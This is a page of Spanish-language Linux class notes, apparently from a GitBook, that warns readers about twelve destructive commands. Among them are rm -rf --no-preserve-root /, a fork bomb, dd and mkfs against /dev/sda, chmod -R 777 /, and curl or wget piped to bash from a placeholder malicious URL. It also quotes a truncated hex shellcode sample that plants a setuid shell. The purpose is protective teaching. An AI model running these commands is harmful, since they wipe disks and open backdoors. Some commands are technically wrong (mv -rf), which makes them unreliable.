🐋
Apuntes Sistemas
  • ⚓Presentación
  • 📊Sistemas y Servidores
    • Personalizar el prompt de Windows
    • Utilidad de manejo de apps para Windows
    • PRACTICA: Arranque dual Windows y Ubuntu
    • 🚧SysLinuxOS: el SO para ASIX
    • Comandos Linux
      • PRACTICA - Ejercicio de práctica comandos
      • 🚧Instalación de paquetes
      • Apuntes Linux: blue/red team
      • Ejemplos de bash
      • Listado de comandos de Linux
    • Comandos Windows
      • 🚧Apuntes Powershell
      • Bucles FOR con batch
      • Scripts de práctica de Windows
    • Prácticas con Windows 10
    • Configuración de netplan
    • Terminal shell
      • SSH
      • 🚧Ghostty
      • 🚧Warp: la terminal inteligente
      • tmux: paneles de terminal
      • Tabby: Mejorar terminal
      • Conexión SSH en red NAT con VirtualBox
      • TheFuck!: Corrección de comandos
      • Wave: Mejorar terminal Linux
      • 🚧Registros de sesiones
    • Instalación manual de Wordpress en CDMON
    • 🏗️Proxmox
    • 🚧TrueNAS
    • Docker
      • Instalación de Docker
      • Dockerfiles
      • Volúmenes de docker
      • Deployment web con Docker con ejemplos
        • 🚧PRACTICA: Node.js con docker
      • Docker Compose
        • Ejemplo 1: Implantación de Wordpress
        • Ejemplo 2: Implementación de servidor con Nginx, Flask y mySQL
        • Ejemplo 3: Implantación de onlyoffice
        • 🚧Ejemplo 4: Passbolt
        • 🚧PRACTICA: Creando una web de emulación de juegos con docker-compose
      • Monitorización con Grafana en Docker
      • Pi-hole con docker
      • Actividad clase: Deployment app
      • Proyectos self-hosted de docker
    • 🚧Ansible
      • Ansible vs. Terraform
    • 🚧Monitorización de servicios y redes
      • Servicios y cronjobs
      • 1Panel
      • 🚧WatchYourLAN
      • 🚧Uptime-kuma
      • 🚧Netdata
      • 🚧Prometheus + Grafana + Loki
    • LDAP
      • 🚧Gestión gráfica de LDAP
      • Carpetas compartidas NFS
      • PRACTICA: Infraestructura LDAP
  • 🗃️Servicios
    • 🚧Servidor hosting público
    • DHCP
      • DHCP con Ubuntu
      • 🦖DHCP & DNS script
      • DHCP con Alpine
        • Alpine - configuración de red
    • DNS
      • 😡Comprobación DNS
      • Script para enumeración DNS
      • DNS con ubuntu server
      • 🏗️DNSmasq
      • 🚧Securizar servidor DNS
    • Web
      • IIS con Windows server
      • Apache
        • Instalación de LAMP en Ubuntu
          • Prueba de servidor LAMP
          • 🚧Configuración de seguridad de Ubuntu
          • Creación de un VirtualHost en LAMP
          • Creación de varios VirtualHosts en LAMP
          • 🚧Instalación por script de LAMP
        • Aplicaciones con LAMP
          • Instalación de WP en entorno LAMP
          • 🚧Instalación de MantisBT en LAMP
            • 👷Guía de MantisBT
          • 🚧Instalación de QDPM con LAMP
      • Nginx
        • Virtualhosts
        • Instalando Wordpress en nginx
      • 👷MEAN stack
      • 👷‍♂️Caddy
      • 🚧Plesk
      • 🚧Ajenti -Web interface
    • 🏗️Proxy
      • Nginx como proxy inverso y balanceador
      • 🚧Zoraxy
    • Mailing
      • 🚧Servidor Mail con cloudfare
      • 🚧Reenvío de correos de root
      • 🚧Roundcube como MUA
      • Comprobación ESMTP
      • 🚧Seguridad en mailing
      • 🚧Mailhog
    • 🏗️File transfer
      • 🚧FTP
      • Git
    • Sistemas de comunicación instantánea
      • Comunicación mediante CLI
      • Ejabberd - XMPP
        • 🚧Ejabberd con docker
      • 🚧Openfire - XMPP
      • 🚧Comunicaciones servidor-móvil
    • 🏗️Multimedia services
      • Stremio
      • Ver anime por CLI
      • Jellyfin
      • 🚧HLS sobre Apache
      • 🚧Servicio autohospedado de videoconferencia
      • 🚧Morphos: Conversor docs
      • 🚧Reproductores de música en CLI
      • 🚧Icecast - música en streaming
      • 🚧RTMP-HLS server
      • 🚧Guacamole
  • 🖱️Hardware
    • 🚧Identificando conectores
    • Curso de electrónica analógica
    • Alcanzar los 3200MHz con la RAM
    • Calculadora de cuellos de botella
    • 🚧PXE: Bootear sistemas en red
    • 🚧PRÁCTICA - Clonación de disco con Clonezilla
    • Logitech iFixit
  • 🕸️Redes
    • Apuntes IPv4 Alina
    • ¿Cómo diferenciar tantos elementos de red?
    • 🚧IPv6
    • PRÁCTICA - Subneteo con IPcalc en Linux
    • PRÁCTICA - Comandos de red en Windows
    • 🚧PRÁCTICA - Comandos de red en Linux
    • Herramientas de red
      • 🚧TCPDump: analizado de paquetes en red
      • PRÁCTICA - Netsh
      • 🚧PRÁCTICA - mtr.ping.pe
      • 🚧Netcat
    • Wireshark
    • VPN y escritorio remoto
      • Comunicación punto a punto con ngrok
      • 🚧VPN
    • Escaneo de red
      • PRÁCTICA - Mapeado de red con Draw.io
      • 🚧PRÁCTICA - Nmap/Zenmap
    • Redes inalámbricas
      • Wi-fi
        • 🚧PRÁCTICA - Configuración de router
        • 🚧PRÁCTICA - Como hacer un Wifi Heatmap
        • 🚧Seguridad de redes inalámbricas
        • PRÁCTICA - Crackear la contraseña del Wifi con WPA/WPA2
    • PRÁCTICA - Usar SSH en Cisco packet tracer
  • 🛑Ciberseguridad
    • 🚧Securizando un servidor Linux
      • Protégete de ataques de fuerza bruta con Fail2ban
      • Firewall
        • UFW (uncomplicated firewall)
          • GUFW - Interfaz gráfica de ufw
        • 🚧IPTables
        • 🚧PFsense
          • 🚧DMZ con PFsense
      • 🚧Passbolt: gestor de contraseñas autohospedado
      • 🚧Hashes y encriptación
      • 🚧Certificados SSL/TLS
      • Copias de seguridad
    • 🚧Alerta de escaneo de puertos
    • 🚧Google dorks
    • 🚧Enumeración DNS
    • Comandos destructivos de linux
    • Webs enseñanza cyber
    • Wireless Pentesting CheatSheet Github
    • The password game!
    • Personal Security Checklist
  • 🔌Arduino
    • Termómetro e higrómetros digitales y online con Arduino
    • Construyendo un coche multipropósito
      • Multi
      • Montaje del auto
    • Arduino con Sigfox para IoT
    • 10 proyectos de Arduino
  • 📚Recursos y libros
    • Media library: libros varios
    • Herramientas básicas de sysadmin
  • 🌍Sostenibilidad y digitalización
    • 🚧Explotación de recursos por IA
    • 🚧Nuevas tecnologias y comunicaciones
    • 🚧Enlaces sobre Inteligencia artificial
Con tecnología de GitBook
En esta página
  1. Ciberseguridad

Comandos destructivos de linux

AnteriorEnumeración DNSSiguienteWebs enseñanza cyber

Última actualización hace 13 días

Linux te da herramientas poderosas, pero con el poder viene una gran responsabilidad. Algunos comandos, si se usan sin precaución, pueden destruir completamente tu sistema, borrar tus datos o crear brechas de seguridad que dejen tu máquina expuesta.

Te voy a enseñar 12 comandos peligrosos de Linux que todo usuario debería conocer con el fin de poder evitarlo ya que si ejecutas cualquiera de estos en tu sistema podrías perderlo todo


1. Eliminación Recursiva

Este infame comando elimina recursivamente y de forma forzada todo desde el directorio raíz. Si se ejecuta como root o con sudo, no hace preguntas, simplemente borra todo el sistema de archivos.

$ sudo rm -rf /

Afortunadamente, las versiones modernas de rm incluyen una protección integrada. Si intentas ejecutar este comando en el directorio raíz (/), se negará por defecto y mostrará una advertencia. Para desactivarlo, un usuario tendría que incluir explícitamente la opción --no-preserve-root:

sudo rm -rf --no-preserve-root /

Esa bandera desactiva la protección y fuerza la eliminación de todo desde la raíz, por lo cual es increíblemente peligrosa y nunca debe usarse en circunstancias normales.


2. Implosionar tu Disco Duro

Mover archivos a /dev/null es esencialmente hacerlos desaparecer. Es el agujero negro de Linux: todo lo que se envía allí se pierde para siempre. Redirigir o mover archivos críticos por error puede llevar a una pérdida de datos irrecuperable.

sudo find / -type f -exec mv /dev/null {} +

# O bien

sudo mv -rf / /dev/null

3. La Bomba Fork

Este comando, aunque corto, es devastador. Define una función que se llama a sí misma repetidamente, consumiendo CPU y memoria hasta que el sistema se congela.

:(){ :|:& };:

Para prevenir este tipo de ataques de denegación de servicio, puedes limitar el número de procesos por usuario:

ulimit -S -u 4000

4. Sobrescribir el Disco

Este comando escribe datos sin procesar directamente en el disco, destruyendo las tablas de particiones y borrando datos. Incluso comandos aparentemente inocentes pueden volverse peligrosos si se dirigen mal.

yes > /dev/sda

5. Descargar y Ejecutar Scripts a Ciegas

Usar wget o curl para descargar y ejecutar un script directamente con bash es muy arriesgado, especialmente si la fuente es desconocida o no verificada.

wget https://malicious_source_url -O - | bash

# ó

curl https://malicious_source_url | bash

Siempre inspecciona los scripts antes de ejecutarlos.


6. Apocalipsis de Permisos

Este comando da permisos de lectura/escritura/ejecución a todos los usuarios sobre todos los archivos del sistema. No solo es inseguro: rompe la estructura de permisos adecuada e introduce vulnerabilidades serias.

sudo chmod -R 777 /

7. Eliminación Recursiva Oculta mediante Código Ofuscado

Los atacantes pueden disfrazar comandos destructivos usando código en hexadecimal para evitar ser detectados. Aquí hay un ejemplo de un payload de rm -rf / codificado en hexadecimal y compilado en C que, al ejecutarse, hace exactamente lo que temes:

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ 
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
  ... // código hexadecimal
  "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

8. Formatear el Disco Duro

Este comando formatea todo tu disco duro, borrando los datos y creando un nuevo sistema de archivos. Un error tipográfico aquí —o una mala interpretación— puede borrar tu sistema operativo al instante.

mkfs.ext3 /dev/sda

9. Escribir Datos Basura en el Disco

Comandos que escriben datos aleatorios o basura directamente al disco pueden destruir por completo el contenido de tu dispositivo de almacenamiento. A veces se usan para destrucción o sobreescritura de datos.

dd if=/dev/urandom of=/dev/sda bs=1M

10. Reejecutar Todos los Comandos del Historial

Este comando ejecuta todo el contenido de tu historial de comandos de una vez. Es completamente impredecible y potencialmente destructivo.

sudo history | sh

11. Reemplazo Rápido de Comando

La sintaxis ^foo^bar es útil para corregir comandos anteriores, pero puede ser peligrosa si se usa sin cuidado. Por ejemplo:

^mv^rm ~/backups

Esto reemplazaría mv por rm, eliminando potencialmente un directorio importante en lugar de moverlo.


12. Eliminar Todos los Crontabs: crontab -r

Un solo flag equivocado y todas tus tareas programadas desaparecen, a diferencia de crontab -e, que edita tareas, -r las elimina por completo y lo hace sin confirmación.

crontab -r

Haz copias de seguridad regularmente de tu crontab y usa el flag -l para listar tareas antes de modificar.

Como ya hemos dicho, no ejecutes ninguno de los comandos anteriores en tu sistema real o en máquinas que te importen. Si tienes curiosidad sobre cómo funcionan, usa una máquina virtual desechable o un contenedor para hacer pruebas.

⚠️
🛑
Page cover image